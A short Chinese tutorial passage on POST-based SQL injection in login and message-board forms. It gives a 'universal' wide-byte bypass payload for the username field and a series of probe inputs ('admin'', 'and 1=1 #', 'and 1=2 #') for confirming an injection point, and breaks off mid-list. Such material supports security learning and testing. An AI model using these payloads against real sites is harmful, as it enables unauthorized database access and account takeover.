基本介绍
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入
注入流程
POST型通杀Payload:
uname=admin%df'or()or%200%23&passwd=&submit=Submit
确定注入|后台sql语句
首先构造以下请求确定注入点的存在:
- POST: admin/admin # 正常显示
- POST: admin'/admin # 非正常显示(有错误信息/意味着False的页面状态)
- POST: admin and 1=1 #/admin # 正常显示
- POST: admin and 1=2 #/admin # 非正常显示(有错误信息/意味着False的页面状态)
由以上判断可以确定存在注入点,这里除了以上构造的Fuzz之外还可能有: